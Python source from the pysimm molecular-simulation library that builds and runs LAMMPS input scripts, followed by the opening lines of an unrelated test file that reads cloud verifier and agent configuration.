cutoff: dictionary of cutoff distances for nonbonded interactions; default={'lj': 12.0, 'coul': 12.0, 'inner_lj': 10.0}
pair_style: LAMMPS pair_style to use during simulation
bond_style: LAMMPS bond_style to use during simulation
angle_style: LAMMPS angle_style to use during simulation
dihedral_style: LAMMPS dihedral_style to use during simulation
improper_style: LAMMPS improper_style to use during simulation
special_bonds: LAMMPS special_bonds to use during simulation
pair_modify: LAMMPS pair_modify to use during simulation
read_data: name of data file to read instead of using :class:`~pysimm.system.System` object
"""
def __init__(self, **kwargs):
self.forcefield = kwargs.get('forcefield')
self.units = kwargs.get('units', 'real')
self.atom_style = kwargs.get('atom_style', 'full')
self.charge = kwargs.get('charge')
self.kspace_style = kwargs.get('kspace_style', 'pppm 1e-4')
self.cutoff = kwargs.get('cutoff')
self.pair_style = kwargs.get('pair_style')
self.bond_style = kwargs.get('bond_style')
self.angle_style = kwargs.get('angle_style')
self.dihedral_style = kwargs.get('dihedral_style')
self.improper_style = kwargs.get('improper_style')
self.special_bonds = kwargs.get('special_bonds')
self.pair_modify = kwargs.get('pair_modify', {})
self.create_box = kwargs.get('create_box')
self.read_data = kwargs.get('read_data')
if self.forcefield and self.forcefield not in ['amber', 'trappe/amber', 'dreiding', 'pcff', 'opls', 'charmm']:
if self.forcefield.lower() in ['gaff', 'gaff2']:
self.forcefield = 'amber'
elif self.forcefield.lower() in ['cgenff']:
self.forcefield = 'charmm'
if isinstance(self.cutoff, int) or isinstance(self.cutoff, float):
self.cutoff = {'lj': self.cutoff, 'coul': self.cutoff, 'inner_lj': self.cutoff-2.0}
if self.cutoff is None:
self.cutoff = {'lj': 12.0, 'coul': 12.0, 'inner_lj': 10.0}
def write(self, sim=None):
"""pysimm.lmps.Init.write
Prepare LAMMPS input with initialization settings
Args:
sim: :class:`~pysimm.lmps.Simulation` object reference
Returns:
string of LAMMPS input
"""
if sim:
s = sim.system
else:
s = None
if self.forcefield is None and s and s.forcefield is not None:
if s.forcefield in ['gaff', 'gaff2']:
self.forcefield = 'amber'
elif s.forcefield in ['cgenff']:
self.forcefield = 'charmm'
else:
self.forcefield = s.forcefield
elif self.forcefield is None and sim and sim.forcefield is not None:
self.forcefield = sim.forcefield
if self.special_bonds is None and self.forcefield is not None:
self.special_bonds = FF_SETTINGS[self.forcefield]['special_bonds']
if self.forcefield is not None:
pair_modify = FF_SETTINGS[self.forcefield]['pair_modify']
if self.pair_modify:
pair_modify.update(self.pair_modify)
self.pair_modify = pair_modify
if self.charge is None and s is not None:
for p in s.particles:
if p.charge:
self.charge = True
break
if self.charge is None:
self.charge=False
lammps_input = ''
lammps_input += '\n' + '#'*80 + '\n'
lammps_input += '#'*34 + ' Init ' + '#'*34 + '\n'
lammps_input += '#'*80 + '\n'
lammps_input += '{:<15} {}\n'.format('units', self.units)
lammps_input += '{:<15} {}\n'.format('atom_style', self.atom_style)
if self.create_box and self.create_box.region and type(self.create_box.region) is Region:
lammps_input += self.create_box.region.write(None)
lammps_input += self.create_box.write(None)
if self.pair_style:
lammps_input += '{:<15} {}'.format('pair_style', self.pair_style)
elif self.forcefield:
self.pair_style = FF_SETTINGS[self.forcefield]['pair_style']
lammps_input += '{:<15} {}'.format('pair_style', self.pair_style)
if self.charge:
lammps_input += '/coul/long'
self.pair_style += '/coul/long'
else:
raise PysimmError('A pair_style must be defined during initialization')
if self.cutoff:
if self.forcefield == ['charmm'] and self.cutoff.get('inner_lj'):
lammps_input += ' {} '.format(self.cutoff['inner_lj'])
lammps_input += ' {} '.format(self.cutoff['lj'])
if self.charge and self.cutoff.get('coul'):
lammps_input += ' {} '.format(self.cutoff['coul'])
lammps_input += '\n'
if self.charge:
lammps_input += '{:<15} {}\n'.format('kspace_style', self.kspace_style)
if self.bond_style is None and s and s.bonds.count > 0:
if self.forcefield:
self.bond_style = FF_SETTINGS[self.forcefield]['bond_style']
if self.bond_style:
lammps_input += '{:<15} {}\n'.format('bond_style', self.bond_style)
if self.angle_style is None and s and s.angles.count > 0:
if self.forcefield:
self.angle_style = FF_SETTINGS[self.forcefield]['angle_style']
if self.angle_style:
lammps_input += '{:<15} {}\n'.format('angle_style', self.angle_style)
if self.dihedral_style is None and s and s.dihedrals.count > 0:
if self.forcefield:
self.dihedral_style = FF_SETTINGS[self.forcefield]['dihedral_style']
if self.dihedral_style:
lammps_input += '{:<15} {}\n'.format('dihedral_style', self.dihedral_style)
if self.improper_style is None and s and s.impropers.count > 0:
if self.forcefield:
self.improper_style = FF_SETTINGS[self.forcefield]['improper_style']
if self.improper_style:
lammps_input += '{:<15} {}\n'.format('improper_style', self.improper_style)
if self.special_bonds:
lammps_input += '{:<15} {}\n'.format('special_bonds', self.special_bonds)
if self.pair_modify:
lammps_input += '{:<15} '.format('pair_modify')
for k, v in self.pair_modify.items():
lammps_input += '{} {} '.format(k, v)
lammps_input += '\n'
if self.read_data:
lammps_input += '{:<15} {}\n'.format('read_data', self.read_data)
elif s:
s.write_lammps('temp.lmps')
lammps_input += '{:<15} temp.lmps\n'.format('read_data')
if self.pair_style and self.pair_style.startswith('buck'):
for pt1 in s.particle_types:
for pt2 in s.particle_types:
if pt1.tag <= pt2.tag:
a = pow(pt1.a*pt2.a, 0.5)
c = pow(pt1.c*pt2.c, 0.5)
rho = 0.5*(pt1.rho+pt2.rho)
lammps_input += '{:<15} {} {} {} {} {}\n'.format('pair_coeff', pt1.tag, pt2.tag, a, rho, c)
lammps_input += '#'*80 + '\n\n'
return lammps_input
class Region(Item):
"""pysimm.lmps.Region
Template object to create a region in a LAMMPS simulation. See LAMMPS documentation for further information
Attributes:
name: name id for region
style: LAMMPS region style
*args: args for given style
**kwargs: optional kwargs for region command
"""
def __init__(self, name='all', style='block', *args, **kwargs):
Item.__init__(self, name=name, style=style, args=args, kwargs=kwargs)
def write(self, sim=None):
inp = '{:<15} {name} {style} '.format('region', name=self.name, style=self.style)
for a in self.args:
inp += '{} '.format(a)
if not self.args:
for _ in range(6):
inp += 'EDGE '
for k, v in self.kwargs.items():
inp += '{} {} '.format(k, v)
inp += '\n'
return inp
class CreateBox(Item):
"""pysimm.lmps.CreateBox
Template object to create a box in a LAMMPS simulation. See LAMMPS documentation for further information
Attributes:
n: number of atom types
region: :class:`~pysimm.lmps.Region` object
**kwargs: optional kwargs for create_box command (replace / with _)
"""
def __init__(self, n=1, region=Region(), *args, **kwargs):
Item.__init__(self, n=n, region=region, args=args, kwargs=kwargs)
def write(self, sim=None):
inp = '{:<15} {n} {region.name} '.format('create_box', **vars(self))
for k, v in self.kwargs.items():
inp += '{} {} '.format(k.replace('_', '/'), v)
inp += '\n'
return inp
class Group(Item):
"""pysimm.lmps.Group
Template object to define a group in a LAMMPS simulation. See LAMMPS documentation for further information
Attributes:
name: name for the group
style: style for the group
*args: arguments for the given style
"""
def __init__(self, name='all', style='id', *args, **kwargs):
Item.__init__(self, name=name, style=style, args=args, **kwargs)
def write(self, sim=None):
inp = '{:<15} {name} {style} '.format('group', name=self.name, style=self.style)
for a in self.args:
inp += '{} '.format(a)
if not self.args:
inp += '*'
inp += '\n'
return inp
class Velocity(Item):
"""pysimm.lmps.Velocity
Template object to define velocity initialization in a LAMMPS simulation. See LAMMPS documentation for further information
Attributes:
group: group for velocity command
style: style for the velocity command
*args: arguments for the given style
"""
def __init__(self, group=Group('all'), style='create', *args, **kwargs):
Item.__init__(self, group=group, style=style, args=args, **kwargs)
if self.seed is None:
self.seed = randint(10000, 99999)
if self.temperature is None:
self.temperature = 300.0
if args:
self.from_args = True
def write(self, sim=None):
if isinstance(self.group, Group):
inp = '{:<15} {group.name} {style} '.format('velocity', group=self.group, style=self.style)
else:
inp = '{:<15} {group} {style} '.format('velocity', group=self.group, style=self.style)
if self.from_args:
for a in self.args:
inp += '{} '.format(a)
elif self.style == 'create' or self.style == 'scale':
inp += '{temp} '.format(temp=self.temperature)
if self.style == 'create':
inp += '{seed} '.format(seed=self.seed)
for k in ['dist', 'sum', 'mom', 'rot', 'bias', 'loop', 'rigid', 'units']:
if getattr(self, k):
inp += '{} {} '.format(k, getattr(self, k))
inp += '\n'
return inp
class OutputSettings(object):
"""pysimm.lmps.OutputSettings
Template object to define thermo and dump output settings in a LAMMPS simulation. See LAMMPS documentation for further information
Attributes:
thermo: dictionary of settings for thermo output
dump: dictionary of settings for dump output
"""
def __init__(self, **kwargs):
self.thermo = kwargs.get('thermo')
self.dump = kwargs.get('dump', kwargs.get('trajectory'))
if isinstance(self.thermo, int):
self.thermo = {'freq': self.thermo}
if isinstance(self.thermo, dict):
self.thermo['freq'] = self.thermo.get('freq', 1000)
self.thermo['style'] = self.thermo.get('style', 'custom')
self.thermo['args'] = self.thermo.get('args', ['step', 'time', 'temp', 'vol', 'press', 'etotal', 'epair', 'emol', 'density'])
self.thermo['modify'] = self.thermo.get('modify')
if isinstance(self.dump, int):
self.dump = {'freq': self.dump}
if isinstance(self.dump, dict):
self.dump['freq'] = self.dump.get('freq', 1000)
self.dump['group'] = self.dump.get('group', Group(name='all'))
self.dump['name'] = self.dump.get('name', 'pysimm_dump')
self.dump['style'] = self.dump.get('style', 'custom')
self.dump['filename'] = self.dump.get('filename', 'dump.*')
self.dump['args'] = self.dump.get('args', ['id', 'type', 'mol', 'x', 'y', 'z', 'vx', 'vy', 'vz'])
self.dump['modify'] = self.dump.get('modify')
if isinstance(self.dump, dict) and isinstance(self.dump['group'], str):
self.dump['group'] = Group(name=self.dump['group'])
def write(self, sim=None):
lammps_input = ''
if isinstance(self.thermo, dict):
lammps_input += '\n' + '#'*80 + '\n'
lammps_input += '#'*29 + ' Thermo output ' + '#'*29 + '\n'
lammps_input += '#'*80 + '\n'
lammps_input += '{:<15} {}\n'.format('thermo', self.thermo['freq'])
lammps_input += '{:<15} {} '.format('thermo_style', self.thermo['style'])
if self.thermo['style'] == 'custom':
lammps_input += ' '.join(self.thermo['args'])
lammps_input += '\n'
if self.thermo.get('modify'):
lammps_input += '{:<15} {} '.format('thermo_modify', self.thermo.get('modify'))
lammps_input += '\n'
lammps_input += '#'*80 + '\n\n'
if isinstance(self.dump, dict):
lammps_input += '\n' + '#'*80 + '\n'
lammps_input += '#'*30 + ' Dump output ' + '#'*30 + '\n'
lammps_input += '#'*80 + '\n'
lammps_input += '{:<15} {} {} {} {} {} '.format('dump', self.dump['name'], self.dump['group'].name, self.dump['style'], self.dump['freq'], self.dump['filename'])
if self.dump['style'] == 'custom':
lammps_input += ' '.join(self.dump['args'])
lammps_input += '\n'
if self.dump.get('modify'):
lammps_input += '{:<15} {} {} '.format('dump_modify', self.dump['name'], self.dump.get('modify'))
lammps_input += '\n'
lammps_input += '#'*80 + '\n\n'
return lammps_input
class Qeq(object):
"""pysimm.lmps.MolecularDynamics
Template object to contain LAMMPS qeq settings
Attributes:
cutoff: distance cutoff for charge equilibration
tol: tolerance (precision) for charge equilibration
max_iter: maximum iterations
qfile: file with qeq parameters (leave undefined for defaults)
"""
def __init__(self, **kwargs):
self.cutoff = kwargs.get('cutoff', 10)
self.tol = kwargs.get('tol', 1.0e-6)
self.max_iter = kwargs.get('max_iter', 200)
self.qfile = kwargs.get('qfile')
self.input = ''
def write(self, sim=None):
"""pysimm.lmps.Qeq.write
Create LAMMPS input for a charge equilibration calculation
Args:
sim: :class:`~pysimm.lmps.Simulation` object reference
Returns:
input string
"""
if self.qfile is None:
param_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
os.pardir, 'dat', 'qeq', 'hcno.json')
with open(param_file) as f:
qeq_params = json.loads(f.read())
with open('pysimm.qeq.tmp', 'w') as f:
for pt in sim.system.particle_types:
f.write('{}\t{}\t{}\t{}\t{}\t{}\n'.format(pt.tag,
qeq_params[pt.elem]['chi'],
qeq_params[pt.elem]['eta']*2,
qeq_params[pt.elem]['gamma'],
qeq_params[pt.elem]['zeta'],
qeq_params[pt.elem]['qcore']))
self.qfile = 'pysimm.qeq.tmp'
self.input = ''
self.input += 'fix 1 all qeq/point 1 {} {} {} {}\n'.format(self.cutoff, self.tol, self.max_iter, self.qfile)
self.input += 'run 0\n'
self.input += 'unfix 1\n'
return self.input
class MolecularDynamics(object):
"""pysimm.lmps.MolecularDynamics
Template object to contain LAMMPS MD settings
Attributes:
name: name to identify MD
group: :class:`~pysimm.lmps.Group` object for integrator
timestep: timestep value to use during MD
ensemble: 'nvt' or 'npt' or 'nve'; default=nve
limit: numerical value to use with nve when limiting particle displacement
temperature: dictionary of settings for temperature (start, stop, damp)
pressure: dictionary of settings for pressure (start, stop, damp)
run: length of MD simulation in number of timesteps or False to omit run command
unfix: True to include command to unfix integrator after run
rigid: dictionary of settings for a rigid simulation
extra_keywords: dictionary of extra keywords to append at the end of the LAMMPS fix integrator
"""
def __init__(self, **kwargs):
self.name = kwargs.get('name', 'pysimm_md')
self.group = kwargs.get('group', Group(name='all'))
self.timestep = kwargs.get('timestep', 1)
self.ensemble = kwargs.get('ensemble', 'nve')
self.limit = kwargs.get('limit')
self.temperature = kwargs.get('temperature', kwargs.get('temp', 300.))
self.pressure = kwargs.get('pressure', 1.)
self.run = kwargs.get('run', kwargs.get('length', 2000))
self.unfix = kwargs.get('unfix', True)
self.rigid = kwargs.get('rigid')
self.extra_keywords = kwargs.get('extra_keywords', {})
if kwargs.get('temp') is not None:
print('temp keyword argument is deprecated for MolecularDynamics, please use temperature instead')
if isinstance(self.group, str):
self.group = Group(name=self.group)
if isinstance(self.temperature, int) or isinstance(self.temperature, float):
self.temperature = {'start': self.temperature}
if isinstance(self.pressure, int) or isinstance(self.pressure, float):
self.pressure = {'start': self.pressure}
if isinstance(self.rigid, dict):
self.ensemble = 'rigid/{}'.format(self.ensemble)
if self.rigid.get('small'):
self.ensemble += '/small '
self.input = ''
def write(self, sim=None):
"""pysimm.lmps.MolecularDynamics.write
Create LAMMPS input for a molecular dynamics simulation.
Args:
sim: pysimm.lmps.Simulation object reference
Returns:
input string
"""
self.input = ''
self.input += '{:<15} {}\n'.format('timestep', self.timestep)
self.input += '{:<15} {} {} {}'.format('fix', self.name, self.group.name, self.ensemble)
if self.ensemble == 'nve' and self.limit:
self.input += '/limit {} '.format(self.limit)
else:
self.input += ' '
if self.rigid:
self.input += '{} '.format(self.rigid.get('style', 'molecule'))
if self.rigid.get('style') == 'group':
assert isinstance(self.rigid.get('groups'), list)
self.input += ' {} '.format(len(self.rigid.get('groups')))
for g in self.rigid.get('groups'):
if isinstance(g, Group):
group_name = g.name
else:
group_name = g
self.input += '{} '.format(group_name)
if 't' in self.ensemble:
self.input += 'temp {} {} {} '.format(self.temperature.get('start', 300.), self.temperature.get('stop', self.temperature.get('start', 300.)), self.temperature.get('damp', 100*self.timestep))
if 'p' in self.ensemble:
self.input += '{} {} {} {} '.format(self.pressure.get('iso', 'aniso'), self.pressure.get('start', 1.), self.pressure.get('stop', self.pressure.get('start', 1.)), self.pressure.get('damp', 1000*self.timestep))
for k, v in self.extra_keywords.items():
self.input += '{} {} '.format(k, v)
self.input += '\n'
if self.run is not False:
self.input += '{:<15} {}\n'.format('run', int(self.run))
if self.run and self.unfix:
self.input += 'unfix {}\n'.format(self.name)
return self.input
class SteeredMolecularDynamics(MolecularDynamics):
def __init__(self, **kwargs):
MolecularDynamics.__init__(self, **kwargs)
self.p1 = kwargs.get('p1')
self.p2 = kwargs.get('p2')
self.k = kwargs.get('k', 20.0)
self.v = kwargs.get('v', 0.001)
self.d = kwargs.get('d', 3.0)
def write(self, sim=None):
"""pysimm.lmps.SteeredMolecularDynamics.write
Create LAMMPS input for a steered molecular dynamics simulation.
Args:
sim: :class:`~pysimm.lmps.Simulation` object reference
Returns:
input string
"""
self.input = ''
if self.thermo:
self.input += 'thermo %s\n' % int(self.thermo)
if self.thermo_style:
self.input += 'thermo_style %s\n' % self.thermo_style
self.input += 'timestep %s\n' % self.timestep
if self.ensemble == 'nvt':
self.input += 'fix 1 all %s temp %s %s %s\n' % (self.ensemble, self.t_start, self.t_stop, self.tdamp)
elif self.ensemble == 'npt':
self.input += ('fix 1 all %s temp %s %s %s iso %s %s %s\n'
% (self.ensemble, self.t_start, self.t_stop, self.tdamp, self.p_start, self.p_stop, self.pdamp))
elif self.ensemble == 'nve':
self.input += 'fix 1 all %s\n' % self.ensemble
if self.new_v:
self.input += 'velocity all create %s %s\n' % (self.t_start, self.seed)
elif self.scale_v:
self.input += 'velocity all scale %s\n' % self.t_start
if self.dump:
if self.dump_name:
self.input += ('dump pysimm_dump all atom %s %s.lammpstrj\n'
% (self.dump, self.dump_name))
elif sim.name:
self.input += ('dump pysimm_dump all atom %s %s.lammpstrj\n'
% (self.dump, '_'.join(sim.name.split())))
else:
self.input += ('dump pysimm_dump all atom %s pysimm_dump.lammpstrj\n'
% self.dump)
if self.dump_append:
self.input += 'dump_modify pysimm_dump append yes\n'
self.input += 'group p1 id {}\n'.format(self.p1.tag)
self.input += 'group p2 id {}\n'.format(self.p2.tag)
self.input += 'fix steer p1 smd cvel {} {} couple p2 auto auto auto {}\n'.format(self.k, self.v, self.d)
self.input += 'run %s\n' % int(self.length)
self.input += 'unfix 1\n'
self.input += 'unfix steer\n'
if self.dump:
self.input += 'undump pysimm_dump\n'
return self.input
class Minimization(object):
"""pysimm.lmps.Minimization
Template object to contain LAMMPS energy minimization settings.
Attributes:
min_style: LAMMPS minimization style default='sd'
dmax: how far any atom can move in a single line search in any dimension
etol: energy tolerance default=1e-3
ftol: force tolerance default=1e-3
maxiter: maximum iterations default=10000
max eval: maximum force evaluations default=100000
"""
def __init__(self, **kwargs):
self.min_style = kwargs.get('min_style', 'fire')
self.dmax = kwargs.get('dmax')
self.etol = kwargs.get('etol', 1.0e-3)
self.ftol = kwargs.get('ftol', 1.0e-3)
self.maxiter = kwargs.get('maxiter', 10000)
self.maxeval = kwargs.get('maxeval', 100000)
self.input = ''
def write(self, sim=None):
"""pysimm.lmps.Minimization.write
Create LAMMPS input for an energy minimization simulation.
Args:
sim: :class:`~pysimm.lmps.Simulation` object reference
Returns:
input string
"""
self.input = ''
self.input += 'min_style %s\n' % self.min_style
if self.dmax:
self.input += 'min_modify dmax %s\n' % self.dmax
self.input += ('minimize %s %s %s %s\n' % (self.etol, self.ftol,
self.maxiter, self.maxeval))
return self.input
class CustomInput(object):
"""pysimm.lmps.CustomInput
Template object to contain custom LAMMPS input.
Attributes:
custom_input: custom input string
"""
def __init__(self, custom_input):
self.input = '{}\n'.format(custom_input)
def write(self, sim=None):
"""pysimm.lmps.CustomInput.write
Create LAMMPS input for a custom simulation.
Args:
sim: pysimm.lmps.Simulation object reference
Returns:
input string
"""
return self.input
class Simulation(object):
"""pysimm.lmps.Simulation
Organizational object for LAMMPS simulation. Should contain combination of
:class:`~pysimm.lmps.MolecularDynamics`, :class:`~pysimm.lmps.Minimization`, and/or :class:`~pysimm.lmps.CustomInput` object.
Attributes:
forcefield: name of force field for simulation settings
name: name for simulation
log: LAMMPS log filename
write: file name to write final LAMMPS data file default=None
print_to_screen: True to have LAMMPS output printed to stdout after simulation ends
debug: True to have LAMMPS output streamed to stdout during simulation (WARNING: this may degrade performance)
custom: option to flag simulation as purley custom input to skip prepaing initialization
"""
def __init__(self, s, **kwargs):
self.system = s
self.forcefield = kwargs.get('forcefield')
if self.forcefield is None and s and s.forcefield is not None:
self.forcefield = s.forcefield
self.debug = kwargs.get('debug', False)
self.print_to_screen = kwargs.get('print_to_screen', False)
self.name = kwargs.get('name', False)
self.log = kwargs.get('log')
self.write = kwargs.get('write', False)
self.custom = kwargs.get('custom')
self._input = ''
self.sim = kwargs.get('sim', [])
def add(self, *args):
for item in args:
if isinstance(item, str):
self.sim.append(CustomInput(item))
else:
self.sim.append(item)
return item
def add_qeq(self, template=None, **kwargs):
"""pysimm.lmps.Simulation.add_qeq
Add :class:`~pysimm.lmps.Qeq` template to simulation
Args:
template: :class:`~pysimm.lmps.Qeq` object reference
**kwargs: if template is None these are passed to :class:`~pysimm.lmps.Qeq` constructor to create new template
"""
if template is None:
self.sim.append(Qeq(**kwargs))
elif isinstance(template, Qeq):
self.sim.append(template)
else:
error_print('you must add an object of type Qeq to Simulation')
def add_md(self, template=None, **kwargs):
"""pysimm.lmps.Simulation.add_md
Add :class:`~pysimm.lmps.MolecularDyanmics` template to simulation
Args:
template: :class:`~pysimm.lmps.MolecularDynamics` object reference
**kwargs: if template is None these are passed to :class:`~pysimm.lmps.MolecularDynamics` constructor to create new template
"""
if template is None:
self.sim.append(MolecularDynamics(**kwargs))
elif isinstance(template, MolecularDynamics):
self.sim.append(template)
else:
error_print('you must add an object of type MolecularDynamics to Simulation')
def add_min(self, template=None, **kwargs):
"""pysimm.lmps.Simulation.add_min
Add :class:`~pysimm.lmps.Minimization` template to simulation
Args:
template: :class:`~pysimm.lmps.Minimization` object reference
**kwargs: if template is None these are passed to :class:`~pysimm.lmps.Minimization` constructor to create new template
"""
if template is None:
self.sim.append(Minimization(**kwargs))
elif isinstance(template, Minimization):
self.sim.append(template)
else:
error_print('you must add an object of type Minimization to Simulation')
def add_custom(self, custom=''):
"""pysimm.lmps.Simulation.add_custom
Add custom input string to simulation
Args:
custom: custom LAMMPS input string to add to Simulation
"""
self.sim.append(CustomInput(custom))
@property
def input(self):
self.write_input()
return self._input
def write_input(self, init=True):
"""pysimm.lmps.Simulation.write_input
Creates LAMMPS input string including initialization and input from templates/custom input
Args:
None
Returns:
None
"""
self._input = ''
if self.log:
self._input += 'log {} append\n\n'.format(self.log)
for task in self.sim:
if isinstance(task, Init):
init = False
if init and not self.custom:
self.sim.insert(0, Init(forcefield=self.forcefield))
for template in self.sim:
self._input += template.write(self)
self._input += 'write_dump all custom pysimm.dump.tmp id q x y z vx vy vz\n'
self._input += 'quit\n'
def run(self, np=None, nanohub=None, save_input=True, prefix='mpiexec'):
"""pysimm.lmps.Simulation.run
Begin LAMMPS simulation.
Args:
np: number of threads to use (serial by default) default=None
nanohub: dictionary containing nanohub resource information default=None
init: True to write initialization part of LAMMPS input script (set to False if using complete custom input)
save_input: True to save input as pysimm.sim.in
prefix: prefix for running LAMMPS (i.e. - mpiexec)
"""
if isinstance(save_input, str):
with open(save_input, 'w') as f:
f.write(self.input)
elif save_input is True:
with open('pysimm.sim.in', 'w') as f:
f.write(self.input)
try:
call_lammps(self, np, nanohub, prefix=prefix)
except OSError:
raise PysimmError('There was a problem calling LAMMPS with {}'.format(prefix))
except IOError:
if check_lmps_exec():
raise PysimmError('There was a problem running LAMMPS. The process started but did not finish successfully. Check the log file, or rerun the simulation with debug=True to debug issue from LAMMPS output')
else:
raise PysimmError('There was a problem running LAMMPS. LAMMPS is not configured properly. Make sure the LAMMPS_EXEC environment variable is set to the correct LAMMPS executable path. The current path is set to:\n\n{}'.format(LAMMPS_EXEC))
def enqueue_output(out, queue):
"""pysimm.lmps.enqueue_output
Helps queue output for printing to screen during simulation.
"""
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def call_lammps(simulation, np, nanohub, prefix='mpiexec'):
"""pysimm.lmps.call_lammps
Wrapper to call LAMMPS using executable name defined in pysimm.lmps module.
Args:
simulation: :class:`~pysimm.lmps.Simulation` object reference
np: number of threads to use
nanohub: dictionary containing nanohub resource information default=None
prefix: prefix for running LAMMPS (i.e. - mpiexec)
Returns:
None
"""
log_name = simulation.log or 'log.lammps'
if nanohub:
with open('temp.in', 'w') as f:
f.write(simulation.input)
if simulation.name:
print('%s: sending %s simulation to computer cluster at nanoHUB' % (strftime('%H:%M:%S'), simulation.name))
else:
print('%s: sending simulation to computer cluster at nanoHUB' % strftime('%H:%M:%S'))
sys.stdout.flush()
cmd = ('submit -n %s -w %s -i temp.lmps -i temp.in '
'lammps-09Dec14-parallel -e both -l none -i temp.in'
% (nanohub.get('cores'), nanohub.get('walltime')))
cmd = shlex.split(cmd)
exit_status, stdo, stde = RapptureExec(cmd)
else:
if simulation.name:
print('%s: starting %s LAMMPS simulation'
% (strftime('%H:%M:%S'), simulation.name))
else:
print('%s: starting LAMMPS simulation'
% strftime('%H:%M:%S'))
if np:
p = Popen([prefix, '-np', str(np),
LAMMPS_EXEC, '-e', 'both'],
stdin=PIPE, stdout=PIPE, stderr=PIPE)
else:
p = Popen([LAMMPS_EXEC, '-e', 'both'],
stdin=PIPE, stdout=PIPE, stderr=PIPE)
simulation.write_input()
if simulation.debug:
print(simulation.input)
warning_print('debug setting involves streaming output from LAMMPS process and can degrade performance')
warning_print('only use debug for debugging purposes, use print_to_screen to collect stdout after process finishes')
p.stdin.write(simulation.input)
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, q))
t.daemon = True
t.start()
while t.isAlive() or not q.empty():
try:
line = q.get_nowait()
except Empty:
pass
else:
if simulation.debug:
sys.stdout.write(line)
sys.stdout.flush()
else:
stdo, stde = p.communicate(simulation.input.encode('utf-8'))
if simulation.print_to_screen:
print(stdo)
print(stde)
simulation.system.read_lammps_dump('pysimm.dump.tmp')
try:
os.remove('temp.lmps')
except OSError as e:
print(str(e))
if os.path.isfile('pysimm.qeq.tmp'):
os.remove('pysimm.qeq.tmp')
try:
os.remove('pysimm.dump.tmp')
if simulation.name:
print('%s: %s simulation using LAMMPS successful'
% (strftime('%H:%M:%S'), simulation.name))
else:
print('%s: simulation using LAMMPS successful'
% (strftime('%H:%M:%S')))
except OSError as e:
if simulation.name:
raise PysimmError('%s simulation using LAMMPS UNsuccessful' % simulation.name)
else:
raise PysimmError('simulation using LAMMPS UNsuccessful')
def qeq(s, np=None, nanohub=None, **kwargs):
"""pysimm.lmps.qeq
Convenience function to call a qeq calculation. kwargs are passed to :class:`~pysimm.lmps.Qeq` constructor
Args:
s: system to perform simulation on
np: number of threads to use
nanohub: dictionary containing nanohub resource information default=None
Returns:
None
"""
sim = Simulation(s, **kwargs)
sim.add_qeq(**kwargs)
sim.run(np, nanohub)
def quick_md(s, np=None, nanohub=None, **kwargs):
"""pysimm.lmps.quick_md
Convenience function to call an individual MD simulation. kwargs are passed to MD constructor
Args:
s: system to perform simulation on
np: number of threads to use
nanohub: dictionary containing nanohub resource information default=None
Returns:
None
"""
sim = Simulation(s, **kwargs)
sim.add_md(**kwargs)
sim.run(np, nanohub)
def quick_min(s, np=None, nanohub=None, **kwargs):
"""pysimm.lmps.quick_min
Convenience function to call an individual energy minimization simulation. kwargs are passed to min constructor
Args:
s: system to perform simulation on
np: number of threads to use
nanohub: dictionary containing nanohub resource information default=None
Returns:
None
"""
sim = Simulation(s, **kwargs)
sim.add_min(**kwargs)
sim.run(np, nanohub)
def energy(s, all=False, np=None, **kwargs):
"""pysimm.lmps.energy
Convenience function to calculate energy of a given :class:`~pysimm.system.System` object.
Args:
s: system to calculate energy
all: returns decomposition of energy if True (default: False)
np: number of threads to use for simulation
Returns:
total energy or disctionary of energy components
"""
sim = Simulation(s, log='pysimm_calc.tmp.log', **kwargs)
sim.add(OutputSettings(thermo={
'freq': 1,
'style': 'custom step etotal epair emol evdwl ecoul ebond eangle edihed eimp'
}))
sim.add_md(length=0, **kwargs)
sim.run(np)
log = LogFile('pysimm_calc.tmp.log')
try:
os.remove('pysimm_calc.tmp.log')
except:
error_print('error likely occurred during simulation')
if all:
return log.data.loc[0]
else:
return log.data.loc[0].TotEng
def check_lmps_attr(s):
# sync of the forcefield-style properties
if hasattr(s, 'forcefield'):
styles_list = FF_SETTINGS['dreiding'].keys()
if s.forcefield in FF_SETTINGS.keys():
for st_prop in styles_list:
setattr(s, st_prop, FF_SETTINGS[s.forcefield][st_prop])
else:
warning_print('Cannot synchronize given forcefield with LAMMPS representation types. '
'The forcefield is not present in the FF_SETTINGS of the pysimm.lmps module')
else:
warning_print('The forcefield attribute of the system is not defined. Some i/o methods of lmps '
'module will not be acessible')
class LogFile(object):
"""pysimm.lmps.LogFile
Class to read LAMMPS log file into Pandas DataFrame stored in LogFile.data
Attributes:
fname: filename of log file
data: resulting DataFrame with log file data
"""
def __init__(self, fname):
if not pd:
raise PysimmError('pysimm.lmps.LogFile function requires pandas')
self.filename = fname
self.data = pd.DataFrame()
self._read(self.filename)
def _read(self, fname):
with open(fname) as fr:
copy = False
for line in fr:
if line.startswith('Step'):
strio = StringIO()
copy = True
names = line.strip().split()
elif line.startswith('Loop'):
copy = False
strio.seek(0)
self.data = self.data.append(pd.read_table(strio, sep='\s+', names=names, index_col='Step'))
elif copy:
strio.write(line)
|
oldtest.py | '''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
from distutils.dir_util import copy_tree
import shutil
sentinel=None
cv_process = None
cn_process = None
cn_process_list = []
queue = queue.Queue()
num_threads = 5
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
registrar_ip = config.get('tenant', 'cloudverifier_ip')
